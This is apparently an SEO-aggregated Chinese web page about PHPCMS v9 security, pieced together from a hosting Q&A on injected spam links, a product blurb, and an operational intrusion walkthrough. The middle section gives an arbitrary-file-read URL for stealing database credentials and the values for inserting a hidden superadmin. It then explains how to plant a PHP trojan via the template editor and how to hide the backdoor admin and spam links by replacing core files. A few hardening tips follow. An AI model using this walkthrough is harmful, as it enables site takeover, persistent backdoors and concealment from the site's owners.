本篇文章给大家谈谈phpcms+v9防护,以及phpcms v9对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。
本文目录一览:
1、phpcms v9 网站二级目录总是被挂黑链接,服务器windows 2008 r2,有什么办法能禁止创建文件
您好,针对您的问题一个一个回答:
1、这个不好查找,可能是CMS本身的漏洞,建议更新到最新版,另外也有可能是同服务器上其他站点的漏洞导致的,首先建议对模板进行筛查,发现可疑代码删除,另外查找配置文件,看有没有修改的痕迹,上术方法如果还不行,就针对phpcms 的整体文件进行替换,备份好数据和模板。
2、对网站目录整体禁止创建文件不现实,不论是生成的静态文件,还是缓存,都需要系统有权限在指定的目录写入文件,如果是特定的目录,可以在文件属性里禁止所有用户写入,包括administrator组,如果是apache的话可以单独配置文件夹权限,建议单独做。
3、监控方面可以看系统日志和服务器日志,看是访问什么路径生成的文件,可能会找到源头,php本身是无法自主运行的,肯定会有一个触发条件,比如访问某个文件等等,另外查看下phpcms 的js文件,有没有加入恶意代码,那类型的代码会在特定的条件下自动加载php文件。
希望可以帮到您,林羽凡。
2、服务器装什么软件 phpcms注入漏洞
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
3、phpcms v9的简介
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。
5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万网站提供助力,并被更多的政府机构、教育机构、事业单位、商业企业、个人站长所认可。
V9在保留2008版的特点的同时,对新版本作出重大的创新,为此我们做出了巨大的努力,希望能为更多的站长提供优质的建站系统!
目前已提供文章、图片、下载等内容模型,在此基础上可非常方便的扩展出信息、房产、交友、点评等功能。已有的模块有:会员、在线充值、全站搜索、评论、专题、新闻心情、短消息、投票、友情链接、公告、附件管理、数据源模块、广告、采集、表单向导、手机门户等模块。
phpcms+v9防护的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于phpcms v9、phpcms+v9防护的信息别忘了在本站进行查找喔。